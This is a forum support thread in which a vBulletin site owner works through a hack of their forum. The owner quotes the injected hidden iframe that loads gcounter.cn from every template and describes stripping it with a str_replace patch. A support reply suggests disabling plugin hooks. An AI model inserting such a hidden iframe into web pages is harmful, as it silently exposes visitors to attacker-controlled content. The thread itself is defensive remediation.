Bloodhound / hacked

Collapse
X
Collapse
 
  • Page of 1
  • Time
  • Show
Clear All
new posts
Previous template Next
  • hyppa
    Senior Member
    • Dec 2007
    • 164
    • 4.2.X
    #1

    Bloodhound / hacked

    My forum has been hacket, and we have had a profeccional team to work to try and solve the problem.

    First we had to remove the portal, and then parts of the phpcode.

    This is so called bad-links.

    Also discovered some strange things when i log on:


    gcounter.cn


    ?




    We are still infected here:


    xxxxxx.com - xxx sex videos free hd porn Resources and Information.
    http://www.xxxxxx.com/xxxxxx/index.php
    xxxxxx.com is your first and best source for all of the information you’re looking for. From general topics to more of what you would expect to find here, xxxxxx.com has it all. We hope you find what you are searching for!



    How can i solve this?

    Will this dessapear if we upgrade?


    Before logging in we get this errorcode:

    Jeg snakker om feilmeldingene:

    Warning: array_merge() [function.array-merge]: Argument #2 is not an array in /index.php(537) : eval()'d code on line 160

    Warning: array_merge() [function.array-merge]: Argument #2 is not an array in /index.php(537) : eval()'d code on line 236



    I assume that is because the Symatec team has removed some of the original php code to try and solve this.


    It dissepears after logging in.






    So my question is:


    How solve this?

    By upgrading?


    No point upgrading from 3.6.8, to latest if the hack is still there.
    Tags: None
    • Steve Machol
      Former Customer Support Manager
      • Jul 2000
      • 154488
      #2
      That specific error is from a plugin you've installed. You need to disable each of your plugins then turn one at a time to see which one is causing this.

      If you cannot log into the Admin CP then to disable the plugin system, edit config.php and add this line right under <?php

      define('DISABLE_HOOKS', true);

      This will disable all hooks and allow you to log in properly with no hooks running.

      vBulletin Manual
      http://www.vbulletin.com/docs/html/disable_plugins



      Please see this thread on how to make your vBulletin more secure:

      vBulletin 6, The World's Leading Community Software
      http://www.vbulletin.com/go/secure
      vBulletin Community Software


      If you are still being hacked after doing all of this, then they are most likely doing this by accessing your server. You need to contact your host about this.
      Steve Machol, former vBulletin Customer Support Manager (and NOT retired!)
      Change CKEditor Colors to Match Style (for 4.1.4 and above)

      Steve Machol Photography

      Mankind is the only creature smart enough to know its own history, and dumb enough to ignore it.


        Comment

        • hyppa
          Senior Member
          • Dec 2007
          • 164
          • 4.2.X
          #3
          Hi.


          I had to


          find this code in all the templates:



          <iframe src=http://gcounter.cn style=display:none></iframe>


          and remove it.

          and then stop the virus/hack by doing this:


          change include/functions.php line 4925

          $output = process_replacement_vars($vartext);

          to

          $output = str_replace("<iframe src=http://gcounter.cn
          style=display:none></iframe>","",process_replacement_vars($vartext));





          So it was gcounter that was the problem.

            Comment

            • hyppa
              Senior Member
              • Dec 2007
              • 164
              • 4.2.X
              #4
              Originally posted by Steve Machol
              That specific error is from a plugin you've installed. You need to disable each of your plugins then turn one at a time to see which one is causing this.

              If you cannot log into the Admin CP then to disable the plugin system, edit config.php and add this line right under <?php

              define('DISABLE_HOOKS', true);

              This will disable all hooks and allow you to log in properly with no hooks running.

              vBulletin Manual
              http://www.vbulletin.com/docs/html/disable_plugins



              Please see this thread on how to make your vBulletin more secure:

              vBulletin 6, The World's Leading Community Software
              http://www.vbulletin.com/go/secure
              vBulletin Community Software


              If you are still being hacked after doing all of this, then they are most likely doing this by accessing your server. You need to contact your host about this.

              I have tested this out and can not find any hack that causes this. Can this be because i have removed the portal?

                Comment

                • Steve Machol
                  Former Customer Support Manager
                  • Jul 2000
                  • 154488
                  #5
                  Possibly. I really don't know what modifications you made.
                  Steve Machol, former vBulletin Customer Support Manager (and NOT retired!)
                  Change CKEditor Colors to Match Style (for 4.1.4 and above)

                  Steve Machol Photography

                  Mankind is the only creature smart enough to know its own history, and dumb enough to ignore it.


                    Comment

                    • hyppa
                      Senior Member
                      • Dec 2007
                      • 164
                      • 4.2.X
                      #6
                      Found it, it was actually two different hacks, but i had to find the combination.


                      THANKS.

                        Comment

                        Previous template Next
                        widgetinstance 262 (Related Topics) skipped due to lack of content & hide_module_if_empty option.
                        Working...